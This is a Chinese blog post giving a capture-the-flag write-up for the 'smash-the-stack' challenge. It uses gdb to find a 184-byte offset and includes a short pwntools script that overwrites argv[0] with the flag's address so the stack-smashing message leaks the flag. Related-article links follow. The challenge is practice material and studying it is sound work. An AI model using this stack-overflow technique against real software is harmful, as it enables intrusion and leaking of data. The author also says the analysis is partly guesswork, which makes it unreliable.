调试argv[0]到缓冲区的距离

最新推荐文章于 2024-10-28 16:34:35 发布
原创 最新推荐文章于 2024-10-28 16:34:35 发布 · 274 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#smash

通过gdb调试smash-the-stack程序,利用栈溢出覆盖返回地址,读取flag。构造payload发送到远程服务器,成功获取目标数据。

hackme.inndy.tw 中的smash-the-stack

gdb调试进入main函数,查看栈空间

发现('/hom')字符串应该就是该文件名,因此我估计是argv[0]的值,故栈中0xffffd114应该是argv[0]

而0xffffd05c估计是缓冲区地址,0xffffd114-0xffffd05c=B8=184

故覆盖184个字节

from pwn import *
cn = remote('hackme.inndy.tw',7717)
elf=ELF('smash-the-stack')

cn.recvuntil('Try to read the flag\n')
payload=p32(0)+'a'*184+p32(0x0804a060)#bss 也即flag的地址
#第一个参数是buf,用来设定buf的长度,可以设小一点
cn.send(payload)
cn.interactive()

 

以上分析是看了别人wirteup后猜测的,请各位高手指教!!!

网络安全--缓冲区溢出实验
一杯水果茶!足矣~
12-05 1364
计算出被攻击的缓冲区首地址与函数的返回地址所在的栈地址的距离(即偏移 OFFSET), 给出溢出后函数的返回地址(用16 进制数表示)。
Win32的缓冲区溢出攻击(涉及用WinDbg分析 overflow函数的返回地址所在的地址与buffer首地址的距离 OFF_SET)
南七行者的博客
12-14 1151
一、实验目的 在32位的Windows2003系统下对 homework. cpp用/FD /Zi/ GS-开关编译为可执行文件,用Windbg分析 overflow函数的返回地址所在的地址与buer首地址的距离 OFF SET。 实验环境 二、实验过程(先学习overflow) 1.overflow函数的源代码 #include <stdio.h> #include <string.h> char largebuff[] ="01234567890123456789ABCDEFGH
利用 gdb 探究main(int argc, char *argv[]){} 中的char *argv[]
weixin_34150224的博客
05-16 288
在 Linux 系统中编写小程序 代码如下 编译并采用gdb调试调试之前设置三个参数 a bb ccc 输入 start 执行代码到 return 0; 从这里可以看到 argc = 4 argv是一个地址值 首先查看argv[0] ~ argv[3] 可以看到字符指针 argv[0] 指向的地址值为 0x7fffffffe328 ...
gdb调试带参数的程序_argv
mw_nice的博客
09-18 5190
例子: #include <stdio.h> int main(int argc,char *argv[]) { int i = argc; printf("argc:%d\n",i); for(i = 0;i < argc;i++) printf("argv[%d]:%s\n",i,argv[i]); return ...
C/C++中main的argv[0]的用途
logiciel的专栏
02-03 5428
C/C++中main的argv[0]的用途。
c语言setbuf函数的作用,C语言setbuf()函数:把缓冲区与流相关联(转)
weixin_29742557的博客
05-16 339
原文链接:https://www.jb51.net/article/71720.htm头文件:#include 函数setbuf()用于将指定缓冲区与特定的文件流相关联,实现操作缓冲区时直接操作文件流的功能。其原型如下:void setbuf(FILE * stream, char * buf);【参数】stream为文件流指针,buf为缓冲区的起始地址。如果参数buf 为NULL 指针,则为无缓...
c语言中命令行参数argc,argv
王以山的专栏
05-18 1662
main( int argc, char ** argv ) argv: 指针的指针 argc: 整数 char **argv or char *argv[] or char argv[][] 为了能形象的说明这两个参数的含义,我们先用一个实例来进行讲解: 假设程序的名称为test,当只输入test,则由操作系统传来的参数为: argc = 1,表示只有一程序名称; argc只有一个元素,argv
缓冲区溢出 - ROP 基础
weixin_46099552的博客
10-28 1227
ROP基础
缓冲区溢出及gdp调试全过程
xumesang的专栏
04-07 3373
在Linux下编写一下代码: #include #include char Lbuffer[] = "01234567890123456789========ABCD"; void foo() { char buff[16]; strcpy (buff, Lbuffer); } int main(int argc, char * argv[]) { foo();
【软件安全】缓冲区溢出攻击(stack overflow)实践
GentleCP的博客
09-30 2450
文章目录前言攻击准备攻击目标与原理漏洞程序攻击程序攻击步骤关闭现有安全机制以root身份编译漏洞程序确定`shellcode`在内存中位置执行攻击程序 前言 最近在研究stack overflow的复现,发现网上许多教程都偏老了,且许多关键步骤没有说明清楚,导致小白在一步步操作的时候经常出现无法正确获取shellcode的情况,本人也是历经诸多大坑,总算是成功复现了这一过程。下面是溢出成功后的效果图。 个中会涉及到参数在函数栈中的存储,栈的返回地址,帧指针,函数如何执行的过程,这部分不再赘述,自行查阅相
__argv[0] 使用方法
simon_new88的专栏
12-25 2929
我们对C语言中main函数这样的写法应该不会陌生:int main(int argc, char *argv[]){......}这是UNIX和Linux中的标准写法。int argc, char *argv[] 表示程序运行的环境变量。int argc表示环境变量的个数,char *argv[] 为存储具体环境变量的字符串指针数组。使用命令行窗口运行程序时,为程序输入多个参数,程序可以调用多个参
argc,argv,argv[0]用法详解
Hakuura天下第一可爱
07-24 8428
http://www.site.uottawa.ca/~lucia/courses/2131-05/labs/Lab3/CommandLineArguments.html You’ll notice that argv[0] is the path and name of the program itself. This allows the program to discover information about itself. char *argv []是一个字符数组,其大小是int ar
argv[0]
#pragma once = 一期一会
01-21 1万+
<br /><br />argc是命令行总的参数个数  <br />   argv []是argc个参数,其中第0 个参数是程序的全名,以后的参数  <br />   命令行后面跟的用户输入的参数,比如:  <br />   int   main(int   argc,   char*   argv [])  <br />   {  <br />   int   i;  <br />   for   (i   =   0 ;   i<argc;   i++)  <br />   cout<<argv
python:argv[0]、path[0]以及__file__区别与简单应用
LLXLQY的博客
02-07 1321
#coding=utf-8 import sys import os ''' 以绝对路径运行脚本时: ''' print('{0}:{1}'.format("sys.argv[0]",sys.argv[0])) print('{0}:{1}'.format("sys.path[0]",sys.path[0])) print('{0}:{1}'.format("os.getcwd()",os.ge...
gdb调试技巧(6)关于源文件路径问题
二进制君
06-20 4148
gdb里面查看源码, list 一下提醒找不到相关文件,列出来的是绝对路径的完整文件名。help files 看一下帮助,可以加载符号,源文件等,自己看一下。dir 设置源码路径无效,show directories 看到设置成功,但是还是找不到文件。 应该是绝对路径的问题。因为gcc 根据你编译的时候指定的是绝对路径还是 …/…/XXX.cpp之类的相对路径,在生成debug_info的时候,也把这个路径保存为debug_info 里面的文件名字,就是最后 gdb list 里面找到的文件名字。
gdb查看内存地址和栈中的值
热门推荐
mergerly的专栏
11-18 1万+
gdb查看指定地址的内存地址的值:examine 简写 x-----使用gdb> help x 来查看使用方式     x/ (n,f,u为可选参数)n: 需要显示的内存单元个数,也就是从当前地址向后显示几个内存单元的内容,一个内存单元的大小由后面的u定义f:显示格式               x(hex) 按十六进制格式显示变量。               d(decimal) 按十进制格式
linux 下 hci_inquiry扫描不到蓝牙设备
最新发布
07-08
printf("请执行: sudo setcap 'cap_net_admin,cap_net_raw+eip' %s\n", argv[0]); exit(1); } ``` #### 4. 物理层与射频问题排查 ```c // 检查信号强度 uint8_t rssi; if (hci_read_rssi(sock, handle, &rssi, ...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值